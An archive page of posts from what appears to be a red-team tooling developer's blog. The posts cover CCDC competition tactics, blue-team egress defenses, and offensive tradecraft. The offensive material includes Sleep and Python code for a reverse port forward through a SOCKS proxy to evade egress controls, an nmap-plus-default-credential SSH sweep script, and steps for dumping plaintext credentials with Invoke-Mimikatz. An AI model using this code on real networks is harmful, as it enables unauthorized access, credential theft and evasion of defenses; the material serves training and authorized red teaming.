Archive for the ‘Red Team’ Category

So, you won a regional and you’re headed to National CCDC

April 17, 2015

The 2015 National CCDC season started with 100+ teams across 10 regions. Now, there are 10 teams left and they’re headed to the National CCDC event next week. If you’re on one of those student teams, this blog post is for you. I’d like to take you inside the red team room and give you my perspective on what you can expect and some ideas that may help you win.

The stakes at National CCDC are high. Last year’s winning team, University of Central Florida, had their picture posted in Times Square.

They were also personally congratulated by Vice President Joe Biden at the White House in Washington, DC. This is a big honor and it’s evidence of how prominent the CCDC event is becoming.

[Photo: Vice President Biden congratulating the UCF team at the White House]

With all of that motivational stuff out of the way, let’s jump into the event specifics.

The Opening Salvo

Your National CCDC experience will start on a comfortable San Antonio, TX day. During my years at National CCDC, the blue teams always receive a clean network.

This network stays clean for about five seconds. The red team gets permission to attack at the same time you get permission to touch your systems. We sit in the red team room and wait until our Team Captain tells us Go! Once that happens, we press enter and a script attacks and backdoors your networks six ways to Sunday.

Each year that I’ve participated in National CCDC, it’s happened this way. There’s nothing you can do about it. The fact that the red team “got in” with default credentials and easy vulnerabilities in the first few minutes is not in your control. It also happens to everyone evenly. When I’m the guy running those scripts, I make it my first priority to verify that every team is hooked the same way before I move on to anything else. Keeping things fair is a priority for me and everyone else I’ve worked with at National CCDC.

Your Network

Each regional event is different, so I’d like to take a moment to describe the network you will defend at National CCDC. [Keep in mind, all of this is subject to change. I have no insider knowledge of the 2015 National CCDC event. I’m giving you what I and returning competitors know.]

First, you will defend a network with a variety of operating systems. Expect a 50/50 mix of Windows and UNIX systems. If I had to venture a guess, I suspect you will see an even mix of dated operating systems and modern ones. Likely, these systems will be part of an Active Directory domain.

At your regional, you probably defended one network. At past National CCDC events, your peers had to defend two networks. One network is set up to act as your local site, in accordance with the scenario. The other network is a “cloud” site and you have to control and defend these systems with remote administration tools.

The makeup of operating systems in the two networks is usually similar.

I’m a fan of the cloud network. I see many blue teams use defense tactics that don’t scale well. The local and cloud networks, combined, are still a small network. Even so, these extra remote systems are enough to stress the blue teams. Each year, I see most teams protect their internal network relatively well, but struggle in big ways with the cloud network. The top teams get both networks under control.

The National CCDC Red Team

The National CCDC red team organizes itself into cells of two to three red teamers per blue team. You may think this is unfair and you may have concerns that the red teamers you get will affect your chances of winning. Don’t worry about this. A lot of effort goes into making this construct fair.

First, the assignment of which red teamers will work together is carefully thought out. Each cell lead is someone who proved themselves at a previous year’s National CCDC event. While we each have specialties (I do a lot more Windows), the expectation is that each lead could handle a blue team by themselves, if necessary.

Second, the initial “malware drop” is scripted across all teams. You and your peers will get the same pile of malware [and configuration changes] to deal with.

Different cells will favor different toolsets, but the National CCDC red team is good at handing off accesses. If one cell loses access with their favored toolset, they have the shell sherpas (red teamers who manage the persistent malware) let them back in. No cell is kicked out of a network until you defeat or get rid of all the malware in your network.

Tempo and Timeline

On the first day, the National CCDC red team is expected to stay silent. In past years, the standing order was to do nothing to give away our presence. The goal is to get you to think we’re the worst red team ever and that there is no red team presence in your network. There’s a reason for this plan. The National CCDC red team wants you to action your injects, snapshot your work, and build up an environment that you’re invested in and trust.

On the second day, your red cell will destroy every system they have access to. You may opt to revert to a snapshot. If you do, the red team’s persistent backdoors will call home. The red team will destroy the system again. This dance will go on for about four hours.

What can you do to escape this?

There are a few options. First, you can revert to a base snapshot from before the event. You’ll lose all of your work and you’ll be vulnerable to the red team trying default things again. If it’s not going to cost you accrued points, I would take the risk and try to get your network up and running as quickly as possible. The red team is fast, but I have yet to work with one that was really good at re-exploiting default weaknesses in a timely manner. We’re too busy.

Your other option is to analyze network traffic, figure out how the red team is communicating with your systems and block it. We don’t typically use pre-implanted time bombs to destroy your systems. If we can’t talk to a system or it can’t talk to us, we probably can’t affect it.
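
If you go the traffic analysis route, a little automation helps. Here’s a rough sketch, using the third-party scapy library, that tallies outbound TCP destinations in a packet capture so that repeated callbacks to the same host and port stand out. The internal prefix is an assumption; adjust it to your team’s address space.

# tally_outbound.py - count outbound TCP destinations in a capture
import collections, sys
from scapy.all import rdpcap, IP, TCP

INTERNAL = '172.16.'      # assumption: change to your team's internal prefix

hits = collections.Counter()
for pkt in rdpcap(sys.argv[1]):
    if IP not in pkt or TCP not in pkt:
        continue
    src, dst = pkt[IP].src, pkt[IP].dst
    # outbound traffic = internal source talking to an external destination
    if src.startswith(INTERNAL) and not dst.startswith(INTERNAL):
        hits[(dst, pkt[TCP].dport)] += 1

for (dst, dport), count in hits.most_common(20):
    print('%7d  %s:%d' % (count, dst, dport))

Whatever rises to the top of that list is a good candidate for a firewall rule.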

Tools, Techniques, and Procedures

A common question to the red team is: what tools did you use? Each cell conducts post-exploitation with the tools it’s most comfortable with. Some cells use the Metasploit Framework for post-exploitation. Others take advantage of Cobalt Strike and its Beacon payload. Some red teamers operate with their private tools. This was the case with Brady Bloxham from Silent Break Security last year. I’ve even seen Core Impact make an appearance at National CCDC here and there.

The post-exploitation toolset is usually different from the persistence toolset. Like a real attacker, the National CCDC red team wants to stay in your network, and they take several precautions to limit your opportunity to observe their persistent backdoors.

The red team will use a variety of public and custom tools to persist in your network. These tools will beacon out of your network in a variety of ways. Their purpose isn’t post-exploitation. These tools are a lifeline. If the red team gets kicked out of your network, they will task one of these tools to let them back in with their preferred tool.

It’s common to see blue teams stuck in a whack-a-mole mindset. They see Meterpreter, Poison Ivy, or something else that’s noisy and obvious. They kill it. Five minutes later, the attacker’s back. This isn’t because the attacker re-exploited their system. It’s because the defender took action against the attacker before they understood how the attacker was getting back in. If you don’t defeat an attacker’s persistence or their command and control, you accomplish very little by knocking out their loud post-exploitation agent.

I’ll offer one caveat to the above… you don’t know when your red cell is on their last shell in your network. If you see something obvious, feel free to kick it out. Maybe it’s the last thing you need to do to send your red cell packing. Some teams reach this nirvana state.

For post-exploitation, the red team will use direct outbound TCP connections if they can get away with it. They will also use HTTP and HTTPS as data channels. In rare instances, we will use DNS, but only if we have to.

Expect that we will have infrastructure for post-exploitation and persistence within the competition environment and out on the internet. I’m known to take heavy advantage of Amazon’s Elastic Compute Cloud during CCDC. I also know one blue team likes to block all of EC2’s IP ranges. I think this is kind of silly, but we do put infrastructure in other places too.

For persistence, expect all kinds of things and expect this to get painful. Expect that the red team will use custom and public tools to slowly call back to them over DNS and HTTP. Again, the red team will have infrastructure locally and in the cloud.

Last year, one of the red team members brought a backdoor that would try multiple ways to get out of your network. It would try a TCP direct connection, HTTP, DNS, and if those failed it would scrape a shared Google Docs file for instructions.

How to Defeat the Red Team

I’m sharing all of this for a reason. I’ve seen some teams get fixated on a specific toolset. They take steps to defeat the Metasploit Framework. Some take steps to defeat Cobalt Strike’s Beacon payload. Others take steps to defeat things we don’t even use.

If you fixate on one specific toolset, you will put yourself at a major disadvantage. If you want to slow down the red team at National CCDC you’re going to have to fall back to generic best practices that defeat whole classes of bad guy activity.

Let’s go through some of the defense practices I see at CCDC…

EMET

I’ve seen many teams install EMET as part of their standard system hardening. I’ve never understood this and I’ve never felt any pain from it. The red team gains most of its accesses in the first five minutes before you have a chance to do much about it. After that, we’re not doing much in the way of memory corruption exploits. Our malware is on your system and we’re just hanging out and doing bad things with it.

Anti-virus Products

Most teams install an anti-virus product or malware scanner. You’re welcome to install one of these products, if you feel there’s nothing more important to do. You may get lucky and catch some off-the-shelf malware with one of these products. In general though, the National CCDC red team uses custom tools and artifacts. I wouldn’t expect much from an anti-virus product.

Hunting for Malware

All blue teams use the Sysinternals Suite from Microsoft to find red team activity. This requires constant vigilance with TCPView and Process Explorer. Sometimes, a team will get lucky and they’ll see something that directs them to the process we live in. If you see SYSTEM processes spawning new processes (especially cmd.exe), that’s probably bad.
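
If you’d rather automate that check than eyeball Process Explorer all day, here’s a minimal sketch using the third-party psutil module. It flags cmd.exe processes whose parent runs as SYSTEM. Treat hits as leads to investigate, not proof of compromise.

# flag_cmd.py - flag cmd.exe processes spawned by a SYSTEM-owned parent
import psutil

for proc in psutil.process_iter(['pid', 'name', 'ppid']):
    if (proc.info['name'] or '').lower() != 'cmd.exe':
        continue
    try:
        parent = psutil.Process(proc.info['ppid'])
        owner = parent.username() or ''
        if 'SYSTEM' in owner.upper():
            print('cmd.exe (pid %d) spawned by %s (pid %d) running as %s'
                  % (proc.info['pid'], parent.name(), parent.pid, owner))
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        pass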

I’ll add one caveat to this: a lot of red team post-exploitation activity happens in an asynchronous way. We queue up our tasks, our payload downloads them with one request, executes them, and reports the results. After that, our payload disconnects from our command and control server and there’s nothing for you to see until it wakes up and connects to us again. All of this happens very quickly and if you blink, you might miss it.

Fighting the red team off of your systems, one process at a time, isn’t going to work over the long term. It’s fine to kick the red team out when you see them, but remember: if you don’t get rid of all of the persistence, you didn’t get rid of the red team.

Restrict Egress

So, what’s the winning strategy? If you want to hurt the red team, you need to make it hard for the malware in your network to talk to the red team. Anything you can do to restrict egress will inflict great amounts of pain on the red team.

There’s a balance here. In a real enterprise, you have to make sure your users can do their jobs and that the business can function. In the CCDC events, you have to make sure the scorebot can communicate and you have to satisfy the Orange team.

Make sure you whitelist which outbound ports are allowed. If there’s no need for your network to initiate outbound connections on port 4444, you shouldn’t allow it. Ideally, you should figure out what has to connect out and allow only these things. The National CCDC red team shouldn’t be allowed to control your network with an arbitrary outbound TCP connection.
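
One way to sanity check your egress rules is to test them the same way the red team will. Here’s a minimal sketch; the listener host is hypothetical and stands in for any box you control outside the competition network that accepts connections on every port you care about.

# egress_check.py - see which outbound ports actually leave the network
import socket

LISTENER = 'egress-test.example.com'    # hypothetical host you control
PORTS = (22, 25, 53, 80, 443, 4444, 8080, 8443)

for port in PORTS:
    try:
        socket.create_connection((LISTENER, port), timeout=3).close()
        print('port %5d  open outbound' % port)
    except OSError:
        print('port %5d  blocked' % port)

If port 4444 or 8443 comes back open and nothing scored needs it, that’s a rule you should add.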

Proxy Servers

Once you restrict outbound connections, you should force all web traffic to go through a proxy server.

In many cases, the Red Team’s HTTP/S persistent agents will run as SYSTEM. If you put in place an authenticated proxy and make it the only way out, you will prevent this malware from ever leaving your network. If our persistent agents can’t communicate with us, we can’t get back into your network and do bad things to it.

I won’t give away any team’s secret sauce here, but I’ve seen blue teams do creative and legitimate things with proxy servers. You can do a lot with a proxy to restrict malware from getting out of your network without impacting users.

DNS Egress

If you do all of the above well, then the next common channel is DNS. There are misconceptions about how this channel works. If your plan is to block port 53 outbound for all systems, except your internal DNS server, you may want to read this blog post.

Your best bet during CCDC is to detect malicious DNS and block it. Detecting isn’t too bad. Configure a sensor to log all DNS queries and sort this log to see which domains have the most activity. The malicious ones in a CCDC event should bubble to the top.
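
The sorting step is a one-liner in most log tools. As an illustration, here’s a rough sketch that assumes you log one query per line with the queried name in the last field; adjust the parsing to whatever your sensor actually emits.

# dns_top.py - rank queried domains by volume
import collections, sys

def registered_domain(name):
    # crude: keep the last two labels (good enough for a competition network)
    parts = name.rstrip('.').split('.')
    return '.'.join(parts[-2:]) if len(parts) >= 2 else name

counts = collections.Counter()
with open(sys.argv[1]) as log:
    for line in log:
        fields = line.split()
        if fields:
            counts[registered_domain(fields[-1])] += 1

for domain, hits in counts.most_common(20):
    print('%8d  %s' % (hits, domain))

A domain with thousands of lookups of long, random-looking subdomains is worth a hard look.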

If you have time and want to put in the effort, you can re-architect your network to isolate internal workstations and servers from the global DNS system. If a workstation needs to browse to a website, let the proxy server handle the DNS resolution for it.

Other Egress

All of the above will make life very painful for the red team. I don’t have a good solution to defeat a red team that uses Google Docs or Twitter for command and control. The best I can offer is this: the more you box the red team in and take away options, the harder you make it for them to do things to you. Even if you can’t defeat everything within the realm of possibility, you can slow the red team down a lot, and in a competition, this is good enough to get ahead of your peers.

The Dirtiest of Red Team Tricks

You’ll recall that I mentioned the red team is organized into cells. Each cell is focused on one team. In the red team room, no one wants their blue cell to win. You should expect that your red cell will do everything within their power to take points away from you. When a red cell steals a database with lots of PII that costs points, every other red cell drops what they’re doing and goes after the same data.

Once we exhaust the data that we can steal, we do everything we can to make it so the scorebot cannot reach your services. We don’t necessarily need access to all of your systems to inflict great pain either. In previous years, we’ve used static ARP entries and ARP poisoning to good effect to create hard-to-track-down layer-2 issues. We’ll also go the old fashioned route and just stop your scored services and delete files that are critical to their operation.

Closing Thoughts

You may read this post and think, wow, those red team folks are mean. That’s really not the case. We’re volunteers who care about your success. If you won a regional, we feel you can handle a great challenge and we want to make sure we give you one.

One of my favorite parts about National CCDC is the interaction I get to have with my blue team. Because the National CCDC red team splits up by team, you’ll find that your red cell has very detailed feedback for you. Once the event is over, I recommend that you track down your red cell and extract as much information from them as you can. You’ll find that your red cell is eager to share what they did, to give you advice, AND to learn from you. I participate in CCDC because each year, I see things that impress me and I learn things that make me think about offense and defense in different ways.

I hope you get the most out of your National CCDC experience. I also hope this blog post helps level the playing field for those of you coming to the event for the first time.

Good luck and do your best!

Reverse Port Forward through a SOCKS Proxy

April 2, 2015

I had a friend come to me with an interesting problem. He had to get a server to make an outbound connection and evade some pretty tough egress restrictions. Egress is a problem I care a lot about [1, 2, 3]. Beacon is a working option for his Windows systems. Unfortunately, the server in question was UNIX-based. He asked if there were a way to make the UNIX system tunnel through Beacon to make its outbound connection.

[Diagram: reverse port forward through a Beacon SOCKS proxy]

The first option is to look at Covert VPN. This is a Cobalt Strike technology to make a layer-2 connection into a target environment. You get an IP address that other systems can connect to and interact with. Once you have a presence in the environment, it’s possible to use native tools to set up a port forward.

I like Covert VPN, but it’s a heavy solution and depending on latency and the layer-2 controls on the pivot network, it may not make sense for a given situation. His situation required him to tunnel Covert VPN through Meterpreter, which he had to tunnel through Beacon, which was calling back to him through multiple redirectors. For this situation, I advised against Covert VPN.

So, what else can one do?

Beacon has a full implementation of the SOCKS4a protocol. Most folks associate SOCKS with outbound connections only. Did you know it’s also possible to use SOCKS for inbound connections?

The SOCKS specification has a BIND command. This command creates a listening socket on the far end and binds it to a specific port. It then waits for someone to connect before it returns an acknowledgement to the SOCKS client. The BIND command was made to enable FTP data transfer to work over a SOCKS proxy.

For intellectual curiosity and to help my friend out, I wondered if we could abuse this BIND option to create a reverse port forward through a Beacon.

A lot of hackers whip out Python or Ruby for these one-off situations. Good, bad, or indifferent, I work in my Sleep language when I need to accomplish a task like this. Here’s the POC I hacked together to do a reverse port forward through a Beacon SOCKS proxy:

# reverse port forward via SOCKS BIND
#
# java -jar sleep.jar relay.sl SOCKS_HOST SOCKS_PORT forward_host forward_port

debug(7 | 34);

# relay traffic from one connection to another
sub relay {
	local('$fromh $toh $data $check $last');
	($fromh, $toh) = @_;
	$last = ticks();
	while (!-eof $fromh) {
		$check = available($fromh);

		# if there's data available.. use it.
		if ($check > 0) {
			$data = readb($fromh, $check);
			writeb($toh, $data);
			$last = ticks();
		}
		# time out this relay if no data in past 2 minutes.
		else if ((ticks() - $last) > 120000) {
			break;
		}
		# sleep for 10ms if nothing to do.
		else {
			sleep(10);
		}
	}

	# clean up!
	closef($fromh);
	closef($toh);
} 

# function to start our relay
sub start {
	local('$handle $fhost $fport $ohandle');
	($handle, $fhost, $fport) = @_;

	# connect to our desired portforward place
	$ohandle = connect($fhost, $fport);

	# create a thread to read from our socket and send to our forward socket
	fork({
		relay($handle, $ohandle);
	}, \$handle, \$ohandle);

	# read from our forward socket and send to our original socket
	relay($ohandle, $handle);
}

# parse command line arguments
global('$phost $pport $fhost $fport $handle $vn $cd $dstport $dstip');
($phost, $pport, $fhost, $fport) = @ARGV;

# connect to SOCKS4 proxy server.
$handle = connect($phost, $pport);

# issue the "bind to whatever and wait for a connection message"
writeb($handle, pack("BBSIB", 4, 2, $fport, 0xFFFFFFFFL, 0));

# read a message, indicating we're connected
($vn, $cd, $dstport, $dstip) = bread($handle, "BBSI");
if ($cd == 90) {
	println("We have a client!");
	start($handle, $fhost, $fport);
}
else {
	println("Failed: $cd");
}

To use this script, you’ll want to create a SOCKS proxy server in Beacon and task Beacon to check in multiple times each second (interactive mode):

socks 1234
sleep 0

To run this script, you’ll need to download sleep.jar. The script accepts four parameters. The first two are the host and port of the Beacon SOCKS proxy server. The last two are the host and port you want Cobalt Strike to forward the connection to. This forward port is also the port the pivot system will listen on for connections.

java -jar sleep.jar relay.sl SOCKS_HOST SOCKS_PORT forward_host forward_port

Example:

java -jar sleep.jar relay.sl 127.0.0.1 1234 192.168.95.190 22

The above example connects to the Beacon SOCKS proxy at 127.0.0.1:1234. It creates a listening socket on the pivot host on port 22. When a connection hits that socket, the relay script connects to 192.168.95.190:22 and relays data between the two connections.

This script works and it demonstrates that reverse port forwards through Beacon are possible. I haven’t tested this elsewhere, but in theory, this same script should yield reverse port forwards for other SOCKS implementations.
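
If Sleep isn’t your thing, the same idea ports to other languages. Here’s a rough Python equivalent of the POC above, written under the same assumption as the Sleep script: the proxy sends a single SOCKS4 success reply once a client connects to the bound port.

# relay.py - reverse port forward via SOCKS4 BIND (sketch)
# usage: python relay.py SOCKS_HOST SOCKS_PORT forward_host forward_port
import socket, struct, sys, threading

def relay(src, dst):
    # copy bytes in one direction until either side closes
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        src.close()
        dst.close()

def main(socks_host, socks_port, fwd_host, fwd_port):
    proxy = socket.create_connection((socks_host, socks_port))
    # SOCKS4 BIND request: VN=4, CD=2, DSTPORT, DSTIP, empty user id + NUL
    proxy.sendall(struct.pack('>BBHI', 4, 2, fwd_port, 0xFFFFFFFF) + b'\x00')
    vn, cd, dstport, dstip = struct.unpack('>BBHI', proxy.recv(8))
    if cd != 90:
        sys.exit('Failed: %d' % cd)
    print('We have a client!')
    target = socket.create_connection((fwd_host, fwd_port))
    threading.Thread(target=relay, args=(proxy, target), daemon=True).start()
    relay(target, proxy)

if __name__ == '__main__':
    host, port, fhost, fport = sys.argv[1:5]
    main(host, int(port), fhost, int(fport))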

Be aware that the BIND option in SOCKS is designed to wait for and forward one connection only. Once a client connects to the pivot host, the listening socket is torn down.

I’ve long understood the value of reverse port forwards. Cobalt Strike has pivot listeners to expose the Metasploit Framework’s ability to relay payload connections through a pivot host. My roadmap for Cobalt Strike 3.0 calls for a turn-key way to use reverse port forwards through Beacon.

My dream is to have a Beacon on a target system inside of an environment and to allow Beacons and other agents to call back to me through this pivot host and to host my malicious goodies through this trusted pivot host. For those of us interested in adversary simulations, this is a beautiful future. Almost as beautiful a dream as a Washington, DC February spent in Puerto Rico. Almost.

There’s a lot of user experience work and other things to sort out before either dream becomes reality. In the meantime, the base mechanism is there.

If none of this makes sense, here’s an updated diagram to clarify:

[Diagram: the reverse port forward relay, step by step]

Training Recommendations for Threat Emulation and Red Teaming

March 26, 2015

A few weeks ago, I had someone write and ask which training courses I would recommend to help set up a successful Red Team program. If you find yourself asking this question, you may find this post valuable.

First things first: you’ll want to define the goals of your red team and what value it’s going to offer to your organization. Some private sector internal red teams do a variety of offensive tasks and work like an internal consulting shop for their parent organization. If you think this is you, please don’t ignore some of the tasks that may fall on your plate, such as reviewing web applications and evaluating different systems for vulnerabilities and bad configurations before they’re added to your environment. I don’t do much with this side of red team activity and my recommendations will show this gap.

When I think about red teaming, I think about it from the standpoint of an aggressor squad: a team that closely emulates a sophisticated adversary’s process to look at security operations holistically, not just as vulnerability/patch management.

I see several private sector red teams moving towards something like Microsoft’s model. Microsoft uses one of their red teams to constantly exercise their post-breach security posture and demonstrate a measurable improvement to their intrusion response over time. Their white paper covers their process and their metrics very well.

If the above describes you, here are the courses I’d go for when building out a team:

1. I’d have everyone work to get the OSCP certification. The offsec courses are good fundamental knowledge every offensive operator should know.

2. Veris Group’s Adaptive Threat Division teaches an Adaptive Red Team Tactics course and they’ll come to your organization to teach it. The Veris Group’s red team class focuses on data mining, abusing active directory, and taking advantage of trust relationships in very large Windows enterprises.

This talk gives a good flavor of how the Veris folks think:

Veris Group is teaching Adaptive Red Team Tactics and their Adaptive Penetration Testing courses at Black Hat USA 2015.

3. Silent Break Security teaches a course called Dark Side Ops: Custom Penetration Testing. Silent Break primarily sells full scope pen tests, and their selling point to customers is that they use custom tools to emulate a modern adversary.

This course is the intersection of malware development and red team tradecraft. They give you their custom tools and put you through 15 labs on how to modify and extend their custom tools with new capability. Their process is dead-on parallel with how I see full scope operations [1, 2].

I reviewed their December 2014 course. Silent Break Security is teaching Dark Side Ops: Custom Penetration Testing at Black Hat USA 2015.

4. I’d also consider putting your money on anything from Attack Research. I plan to eventually take their Tactical Exploitation course. Their Meta-Phish paper from 2009 had more influence on how I think about offense than anything else I’ve read. I have friends who’ve taken their courses and they say they’re excellent.

Tactical Exploitation

MetaPhish

Tactical Exploitation is available at Black Hat USA 2015 as well.

5. I’d invest in a PowerShell skillset and take a course or two along these lines. Most of the high-end red teams I see have bought into PowerShell full-bore for post-exploitation. As a vendor and non-PowerShell developer, I had to embrace PowerShell, or watch my customers move ahead without me. They’re going this way for good reason though. Using native tools for post-ex will give you more power with less opportunity for detection than any other approach. I don’t know of a specific course to point you to here. Carlos Perez (DarkOperator) teaches a PowerShell for Hackers course at DerbyCon and it gets very good reviews.

6. If you’re interested in Cobalt Strike, I do offer the Advanced Threat Tactics course. My course is primarily a developer’s perspective on the Cobalt Strike product. This course is similar to the Tradecraft course except it includes labs, an exercise, and it’s up to date with the latest Cobalt Strike capabilities.

The First Five Minutes

March 19, 2015

March and April are CCDC season. This is the time of the year when teams of college students get to compete against each other as they operate and defend a representative enterprise network from a professional red team.

CCDC events are the most interesting for the blue teams and red teams when the red team plays the role of an embedded attacker. Getting embedded into student networks doesn’t come for free though. Most CCDC events do not allow the red team to touch the networks before the students do. Often, the students and the red team get access to the networks at the same time. Here’s a clip from one of the regional events last year:

Once the event starts, the first minutes are critical. To ensure a good competition, the red team needs to discover the vulnerable systems (or find out the default credentials), get access to these systems, and install persistence on them. These actions have to happen across 10+ networks and they have to happen before the student teams take their vulnerable systems off of the network for hardening.

I’ve seen events where the above goes off without a hitch. I’ve seen events where disaster struck right away. Last year at National CCDC, the hotel staff plugged a mini-fridge into the red team’s circuit at the start of the event. We lost all power and had a good five to ten minute setback because of it.

I’ve also seen scripts fail, causing each individual red team member to scramble, gain what access they can, and try to persist or do anything they possibly can in those critical minutes.

I used to rely on scripts to scan for systems, exploit them, and install persistence. Sometimes these scripts would work great. Other times I’d miss a detail and squander the precious starting minutes troubleshooting the script. Now, I do many things by hand, but still try to stay efficient.

Here’s my process:

To quickly discover interesting hosts in a CCDC event, I run an nmap scan for two ports: 445 and 22. I set up my command to run this scan and wait until the red team lead yells “go” to press enter.

db_nmap -sV -O -T4 -p 22,445 [student ranges here]

Once the scan completes, the Metasploit Framework will import the results into its database. In Cobalt Strike, these hosts will show in the target area at the top of the tool. I almost always work with the table view at a CCDC event. To do this, go to Cobalt Strike -> Set Target View -> Table View.

From the table view, I can sort my discovered hosts by any of the columns. The far left column is the operating system icon. If you sort by this column, you will find that like-operating systems are now sorted together. This makes mass exploitation, without a script, rather easy.

To mass exploit the UNIX systems, I simply highlight all of the like UNIX systems in the interface. I right-click and go to Login -> SSH. I then put in what I think are the default credentials. The Launch button will launch the Metasploit Framework’s ssh_login module against all highlighted hosts.

One pro-tip: hold down shift when you click Launch. Cobalt Strike will keep the dialog open allowing you to quickly try another username and password combination. I repeat this process until something works.
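
If you want to see the same default-credential sweep outside of a GUI, here’s a bare-bones sketch using the third-party paramiko library. The hosts and credential pairs are placeholders; at the event I do this through the ssh_login module as described above.

# ssh_sweep.py - try a few default credentials against a list of hosts
import paramiko

HOSTS = ['10.0.1.10', '10.0.1.11']                  # placeholder targets
CREDS = [('root', 'toor'), ('admin', 'changeme')]   # placeholder defaults

for host in HOSTS:
    for user, password in CREDS:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(host, username=user, password=password, timeout=5)
            print('[+] %s:%s works on %s' % (user, password, host))
            break
        except Exception:
            pass
        finally:
            client.close()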

To mass exploit Windows systems, I do the same thing, except I use psexec to get my Windows accesses. When you launch psexec in Cobalt Strike, I recommend that you set it up to deliver a Beacon payload. This is Cobalt Strike’s asynchronous payload and it’s very resilient to network latency and other interruptions. You will have no shortage of either of these in the beginning of a CCDC event.

Now at this point, you should have access to some Windows and UNIX systems on all teams. The next task is to lay down persistence on these systems. This is the part I script with Cortana.

UNIX systems are easy to work with in Cortana. Cortana provides functions to issue commands and upload files through a shell. When I built these functions, I did my best to make sure each command happens in order before proceeding on to the next step. UNIX persistence scripted with these commands tends to work reliably. To build UNIX persistence scripts and backdoor droppers, I borrow heavily from int128’s infect.cna script.

What about Windows persistence? This is a sad tale of woe. In 2012 and 2013, I would use Cortana to script my Windows persistence through Meterpreter. Last year, Meterpreter would consistently crash when I issued all of my persistence commands to it. Stuck in a pickle, I put together an emergency API to automate a few things in Beacon. This API isn’t a substitute for a real Beacon scripting API (it’s coming!), but it worked in a pinch.

This emergency API allows a script to task Beacon to execute commands, upload files, and timestomp files. Beacon executes each of its tasks in one thread and it doesn’t move on to the next task until the previous task has had reasonable time to complete. This makes it easy to build a very reliable persistence script through Beacon. I wrote a blog post on this emergency API two weeks ago.

Another key to success is good infrastructure. I never know what to expect at a CCDC event. If the event is isolated from the internet, I make do with binding multiple IP addresses to my team server Linux boxes in red space. If the competition systems have internet access, I leverage Amazon’s EC2 quite heavily. I’ve seen some teams, knowing this factoid, block all of Amazon’s space. I think this is outside the spirit of the competition, but that’s white cell’s call and not mine. When I setup infrastructure in EC2, I tend to follow the team server organization scheme described in my infrastructure for on-going red team operations post.

And, that’s the process I use. If you’re curious about what the first hour looks like on my end, here’s my screen recording from RIT SPARSA’s ISTS event two weeks ago. In it, you’ll see the opening salvo and then my process to account for accesses, fix my scripts on the fly, and work to get into systems that I wasn’t able to get access to initially.

I’ll close this blog post with one question: should it be this way? CCDC and other events like it usually give students dated operating systems to allow the red team an easy foothold. Outside of this community, I’ve seen events where blue players defend larger networks with modern operating systems and pre-existing defenses in place. In these scenarios, the red team pre-seeds their access or relies on a click from a “user” who has access to the target’s environment. We use the access we have to play the role of an embedded attacker and execute actions or capture flags that satisfy blue training requirements. The blue teams work to detect, understand, and mitigate our activity. These types of games exercise blue team work, technical skills, and analysis in a security operations context. When I think about how I’d like to see CCDC evolve, this is a model I’m favorable to. What’s the right way forward? I’m not certain, but so long as CCDC and events like it continue to motivate students to practice critical security skills, I’m happy to work with the current model.

My Favorite PowerShell Post-Exploitation Tools

February 25, 2015

PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.

[Screenshot: running PowerShell post-exploitation scripts through Beacon]

PowerSploit

Let’s start with PowerSploit. This is a post-exploitation toolkit originally put together by Matt Graeber with contributions from Chris Campbell, Joe Bialek, and others. When I use Beacon, this toolset is almost a drop-in replacement for features that I would normally need Meterpreter to get to.

For example, if I want to use mimikatz to dump plaintext credentials, I simply import the Exfiltration/Invoke-Mimikatz.ps1 script and call the Invoke-Mimikatz cmdlet. Simple.

PowerSploit also features several great tools to steal credentials in other ways, log keystrokes, and take screenshots.

PowerUp

Every Christmas, I ask Santa for a privilege escalation vulnerability scanner. This has long made sense to me. When I have access to a system, I am in a good position to conduct automated reconnaissance and identify a known weakness to elevate with. Will Schroeder answered my wish with the PowerUp tool. This PowerShell script interrogates the system in several ways to find a privilege escalation opportunity. It even offers some helpful cmdlets to help you take advantage of the misconfigurations and weaknesses it finds. To use PowerUp I just import PowerUp.ps1 into Beacon and run the Invoke-AllChecks cmdlet.

PowerView

Last on my list is PowerView (also by Will Schroeder). This script is a full toolkit to interrogate a domain for hosts, users, and complex trust relationships. I probably use less than 10% of its potential capability right now. I tend to use PowerView to list hosts on a network and to quickly find out where I may have admin rights with my current token. This has become one of my first network reconnaissance tools and it has eliminated a need to scan for targets in many cases. My favorite PowerView cmdlets are Invoke-Netview and Invoke-FindLocalAdminAccess.

Another Night, Another Actor

February 19, 2015

Earlier last year, I had a frantic call from a customer. They needed to make a small change to Beacon’s communication pattern, and quickly. This customer was asked to spend a week with a network defense team and train them on different attacker tactics. Each day, my customer had to show the network defense team all of their indicators and walk them through each of their activities. After a few days, the network defense team was able to zero in on Cobalt Strike’s Beacon, and my customer was having trouble conducting other types of training activity because of this.

A blue training audience gets the most benefit from a red team’s activity when the red team shares their indicators, tactics, and knowledge with them. Clear indicator information allows the blue team to look at their sensors and see what they missed when they tried to put the story together. An open discussion of favored tactics (e.g., ways to do lateral movement, techniques like the Golden Ticket, etc.) allows a blue team to address major gaps in their defenses.

For red teams, openness comes at a cost. Tools and capabilities are expensive to buy or time-consuming to build. A red team’s effectiveness comes down to skilled operators and tools that give them freedom to work in a network. You need both. A poor operator will misuse a good tool. Depending on the maturity of the training audience and environment, a skilled operator may find themselves completely unable to operate without good tools to support them.

When a red team gives up all of their operating information, they’ve given their training audiences a gift-wrapped roadmap to detect their activity now and into the future. It’s a lot harder to play the role of an unknown adversary when your tools are well understood by the training audience.

To deal with this problem, most red teams choose to keep information about their tools and tactics close hold. They’re relying on a strategy of obscurity to protect their investment and to extend the productive life of their current technologies. This is at direct odds with what a red team should offer.

I think about this problem a lot. I sell a public solution that allows red teams to operate. I do not have the luxury of obscurity. I also don’t want obscurity. I want the training audiences I work with to get the most benefit possible from the red team activity my customers and I conduct. This means my customers need to feel safe disclosing details about their operations and their use of my tools.

I’ve made some headway on this problem and it’s one of the things in Cobalt Strike I’m most proud of.

On-disk, Cobalt Strike has its Artifact Kit. This is my source code framework to build all of Cobalt Strike’s executables and DLLs. My customers get the source code to this framework and they have the freedom to change this process and introduce other techniques to evade anti-virus. Cobalt Strike also plays nice with the Veil Evasion Framework. It’s trivial to export one of Cobalt Strike’s proprietary stagers in a Veil-friendly format too.

